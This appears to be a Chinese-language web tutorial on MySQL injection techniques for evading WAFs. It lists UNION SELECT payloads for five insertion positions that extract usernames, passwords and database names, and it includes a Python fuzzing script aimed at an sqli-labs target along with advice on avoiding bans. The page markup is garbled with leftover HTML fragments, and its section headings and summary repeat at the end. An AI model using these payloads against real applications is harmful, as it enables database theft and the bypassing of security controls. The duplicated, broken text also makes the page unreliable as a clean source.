MySQL注入绕过技术详解<\/h1>

0x01 前言<\/h2>
本文总结了MySQL注入中各种绕过WAF(Web应用防火墙)的技术手段，围绕SQL语句中的五个关键位置进行详细分析，并提供实际示例和FUZZ方法。<\/p>

0x02 SQL注入关键位置分析<\/h2>
在SQL注入中，可以将每个SQL关键字两侧可插入的点称为"位"，主要分为五个关键位置：<\/p>

位置一：关键字前<\/h3>

注释符<\/strong><\/p>

\/**\/<\/span>union<\/span> select<\/span> 1<\/span>,user<\/span>,3<\/span> from<\/span> admin<\/span>
<\/span><\/span>\/*!50000union*\/<\/span> select<\/span> 1<\/span>,user<\/span>,3<\/span> from<\/span> admin<\/span>
<\/span><\/span><\/code><\/pre><\/li>

空白符<\/strong><\/p>

可使用%09<\/code>,%0a<\/code>,%0b<\/code>,%0c<\/code>,%0d<\/code>,%20<\/code>,%a0<\/code>等<\/li>
<\/ul>
1<\/span>%<\/span>0<\/span>aunion select<\/span> 1<\/span>,user<\/span>,3<\/span> from<\/span> admin<\/span>
<\/span><\/span><\/code><\/pre><\/li>

科学计数法<\/strong><\/p>
2<\/span>e0 union<\/span> select<\/span> 1<\/span>,user<\/span>,3<\/span> from<\/span> admin<\/span>
<\/span><\/span>1<\/span>.union<\/span> select<\/span> 1<\/span>,user<\/span>,3<\/span> from<\/span> admin<\/span>
<\/span><\/span>1<\/span>'%1%2Eunion select user(),2%23
<\/span><\/span><\/span><\/code><\/pre><\/li>

单引号双引号<\/strong><\/p>
1<\/span>' '<\/span>xx'union select user(),2%23
<\/span><\/span><\/span>1'<\/span> ""<\/span>union<\/span> select<\/span> user<\/span>(),2<\/span>%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre><\/li>

x@符号<\/strong><\/p>
-@<\/span> union<\/span> select<\/span> 1<\/span>,2<\/span>,3<\/span>%<\/span>23<\/span>
<\/span><\/span>%<\/span>26<\/span>@<\/span> union<\/span> select<\/span> 1<\/span>,2<\/span>,3<\/span>%<\/span>23<\/span>
<\/span><\/span>-@@<\/span>new<\/span> union<\/span> select<\/span> 1<\/span>,2<\/span>,3<\/span>%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre><\/li>

{x key}<\/strong><\/p>
and<\/span> {<\/span>x -<\/span>2<\/span>}<\/span> union<\/span> select<\/span> 1<\/span>,2<\/span>,3<\/span>%<\/span>23<\/span>
<\/span><\/span>and<\/span> {<\/span>x id}<\/span> union<\/span> select<\/span> 1<\/span>,2<\/span>,3<\/span>%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre><\/li>

其他<\/strong><\/p>
\<\/span>Nunion select<\/span> 1<\/span>,2<\/span>,3<\/span>%<\/span>23<\/span>
<\/span><\/span>null<\/span> union<\/span> select<\/span> 1<\/span>,2<\/span>,3<\/span>%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre><\/li>

函数<\/strong><\/p>
and<\/span> MD5('a'<\/span>) union<\/span> select<\/span> 1<\/span>,password,database<\/span>() from<\/span> users--+
<\/span><\/span><\/span><\/span>and<\/span> binary @<\/span> union<\/span> select<\/span> 1<\/span>,password,3<\/span> from<\/span> users--+
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
位置二：UNION和SELECT之间<\/h3>


空白符<\/strong><\/p>
union<\/span>%<\/span>0<\/span>aselect 1<\/span>,user<\/span>,3<\/span> from<\/span> admin<\/span>
<\/span><\/span><\/code><\/pre><\/li>

注释<\/strong><\/p>
union<\/span>\/**\/<\/span>select<\/span> 1<\/span>,user<\/span>,3<\/span> from<\/span> admin<\/span>
<\/span><\/span><\/code><\/pre><\/li>

括号<\/strong><\/p>
union<\/span>(select<\/span> 1<\/span>,(password),3<\/span>,4<\/span>,5<\/span>,6<\/span> from<\/span>(users))%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre><\/li>

ALL | DISTINCT | DISTINCTROW<\/strong><\/p>
union<\/span> ALL<\/span> select<\/span> 1<\/span>,password,3<\/span> from<\/span> users%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre><\/li>

函数分隔<\/strong><\/p>
union<\/span>%<\/span>23<\/span>%<\/span>0<\/span>Aselect 1<\/span>,password,3<\/span> from<\/span> users%<\/span>23<\/span>
<\/span><\/span>union<\/span>-- xx%0Aselect 1,password,3 from users%23
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
位置三：SELECT和列名之间<\/h3>


空白符<\/strong><\/p>
select<\/span>%<\/span>091<\/span>,password,3<\/span> from<\/span> users%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre><\/li>

注释<\/strong><\/p>
select<\/span>\/**\/<\/span>1<\/span>,password,3<\/span> from<\/span> users%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre><\/li>

ALL | DISTINCT | DISTINCTROW<\/strong><\/p>
select<\/span> ALL<\/span> 1<\/span>,password,3<\/span> from<\/span> users%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre><\/li>

{} ()<\/strong><\/p>
select<\/span>{<\/span>x 1<\/span>}<\/span>,password,3<\/span> from<\/span> users%<\/span>23<\/span>
<\/span><\/span>select<\/span>(1<\/span>),password,3<\/span> from<\/span> users%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre><\/li>

符号<\/strong><\/p>
select<\/span>+<\/span>1<\/span>,password,3<\/span> from<\/span> users%<\/span>23<\/span>
<\/span><\/span>select<\/span>""<\/span>a1,password,3<\/span> from<\/span> users%<\/span>23<\/span>
<\/span><\/span>select<\/span>+@<\/span>a1,password,3<\/span> from<\/span> users%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre><\/li>

函数<\/strong><\/p>
select<\/span> MD5('a'<\/span>)|<\/span>1<\/span>,2<\/span>,database<\/span>() from<\/span> users--+
<\/span><\/span><\/span><\/span>select<\/span> reverse('xx'<\/span>),password,3<\/span> from<\/span> users%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
位置四：列名和FROM之间<\/h3>


空白符<\/strong><\/p>
select<\/span> 1<\/span>,2<\/span>,user<\/span>()%<\/span>23<\/span>from<\/span> users--+
<\/span><\/span><\/span><\/code><\/pre><\/li>

注释<\/strong><\/p>
select<\/span> 1<\/span>,2<\/span>,user<\/span>()\/**\/<\/span>from<\/span> users--+
<\/span><\/span><\/span><\/code><\/pre><\/li>

反引号<\/strong><\/p>
select<\/span> 1<\/span>,2<\/span>,password``<\/span>from<\/span> users``<\/span>--+
<\/span><\/span><\/span><\/code><\/pre><\/li>

花括号<\/strong><\/p>
select<\/span> 1<\/span>,2<\/span>,{<\/span>x password}<\/span>from<\/span> users--+
<\/span><\/span><\/span><\/span>select<\/span> 1<\/span>,2<\/span>,(password)from<\/span> users--+
<\/span><\/span><\/span><\/code><\/pre><\/li>

符号<\/strong><\/p>
select<\/span> 1<\/span>,user<\/span>(),""<\/span>from<\/span> users--+
<\/span><\/span><\/span><\/span>select<\/span> 1<\/span>,password,3<\/span>e1from users--+
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
位置五：FROM和表名之间<\/h3>


空白符<\/strong><\/p>
select<\/span> 1<\/span>,2<\/span>,user<\/span>() from<\/span>%<\/span>0<\/span>dusers--+
<\/span><\/span><\/span><\/code><\/pre><\/li>

注释<\/strong><\/p>
select<\/span> 1<\/span>,2<\/span>,user<\/span>() from<\/span>\/**\/<\/span>users--+
<\/span><\/span><\/span><\/code><\/pre><\/li>

花括号<\/strong><\/p>
select<\/span> 1<\/span>,user<\/span>(),3<\/span> from<\/span>(users)--+
<\/span><\/span><\/span><\/span>select<\/span> 1<\/span>,user<\/span>(),3<\/span> from<\/span>{<\/span>x users}<\/span>--+
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x03 FUZZ技术<\/h2>
当单一绕过技术无效时，可以使用FUZZ方法尝试多种字符组合：<\/p>
Python FUZZ脚本示例<\/h3>
import<\/span> requests
<\/span><\/span>import<\/span> itertools
<\/span><\/span>
<\/span><\/span>List =<\/span> [
<\/span><\/span>    '%20'<\/span>, '%09'<\/span>, '<\/span>%0a<\/span>'<\/span>, '%0b'<\/span>, '<\/span>%0c<\/span>'<\/span>, '<\/span>%0d<\/span>'<\/span>, '<\/span>%2d%2d<\/span>'<\/span>, 
<\/span><\/span>    '%23'<\/span>, '<\/span>%a<\/span>0'<\/span>, '%2D%2D%2B'<\/span>, '%5C<\/span>%4E<\/span>'<\/span>, '<\/span>\\<\/span>N'<\/span>
<\/span><\/span>]
<\/span><\/span>
<\/span><\/span>count =<\/span> 0<\/span>
<\/span><\/span>num =<\/span> 2<\/span>  # fuzz num个字符组合<\/span>
<\/span><\/span>target =<\/span> 'http:\/\/localhost\/sqli-labs-master\/Less-1\/?id=-1<\/span>\'<\/span>'<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> itertools.<\/span>product(List, repeat=<\/span>num):
<\/span><\/span>    count +=<\/span> 1<\/span>
<\/span><\/span>    print(count, ':'<\/span>, len(List)**<\/span>num)
<\/span><\/span>    str =<\/span> ''<\/span>.<\/span>join((i))
<\/span><\/span>    payload =<\/span> '<\/span>{}<\/span>union select 1,user(),3 from users%23'<\/span>.<\/span>format(str)
<\/span><\/span>    url =<\/span> target +<\/span> payload
<\/span><\/span>    req =<\/span> requests.<\/span>get(url=<\/span>url)
<\/span><\/span>    if<\/span> "root@localhost"<\/span> in<\/span> req.<\/span>text:
<\/span><\/span>        print(url)
<\/span><\/span>        with<\/span> open("result.txt"<\/span>, 'a'<\/span>, encoding=<\/span>'utf-8'<\/span>) as<\/span> r:
<\/span><\/span>            r.<\/span>write(str +<\/span> "<\/span>\n<\/span>"<\/span>)
<\/span><\/span><\/code><\/pre>FUZZ建议<\/h3>

使用Burp Suite等工具进行自动化FUZZ<\/li>
尝试2-3个字符的组合<\/li>
降低请求频率以避免被ban<\/li>
重点关注状态码为200的响应<\/li>
<\/ol>
0x04 总结<\/h2>
MySQL注入绕过技术主要围绕SQL语句的五个关键位置，通过插入各种特殊字符、注释、函数等方式来绕过WAF检测。实际应用中，往往需要结合多种技术并进行FUZZ测试才能找到有效的绕过方法。<\/p>

MySQL注入绕过技术详解<\/h1>

0x01 前言<\/h2> 本文总结了MySQL注入中各种绕过WAF(Web应用防火墙)的技术手段，围绕SQL语句中的五个关键位置进行详细分析，并提供实际示例和FUZZ方法。<\/p>

0x02 SQL注入关键位置分析<\/h2> 在SQL注入中，可以将每个SQL关键字两侧可插入的点称为"位"，主要分为五个关键位置：<\/p>

0x03 FUZZ技术<\/h2> 当单一绕过技术无效时，可以使用FUZZ方法尝试多种字符组合：<\/p>

0x04 总结<\/h2> MySQL注入绕过技术主要围绕SQL语句的五个关键位置，通过插入各种特殊字符、注释、函数等方式来绕过WAF检测。实际应用中，往往需要结合多种技术并进行FUZZ测试才能找到有效的绕过方法。<\/p>

0x01 前言<\/h2>
本文总结了MySQL注入中各种绕过WAF(Web应用防火墙)的技术手段，围绕SQL语句中的五个关键位置进行详细分析，并提供实际示例和FUZZ方法。<\/p>

0x02 SQL注入关键位置分析<\/h2>
在SQL注入中，可以将每个SQL关键字两侧可插入的点称为"位"，主要分为五个关键位置：<\/p>

0x03 FUZZ技术<\/h2>
当单一绕过技术无效时，可以使用FUZZ方法尝试多种字符组合：<\/p>

0x04 总结<\/h2>
MySQL注入绕过技术主要围绕SQL语句的五个关键位置，通过插入各种特殊字符、注释、函数等方式来绕过WAF检测。实际应用中，往往需要结合多种技术并进行FUZZ测试才能找到有效的绕过方法。<\/p>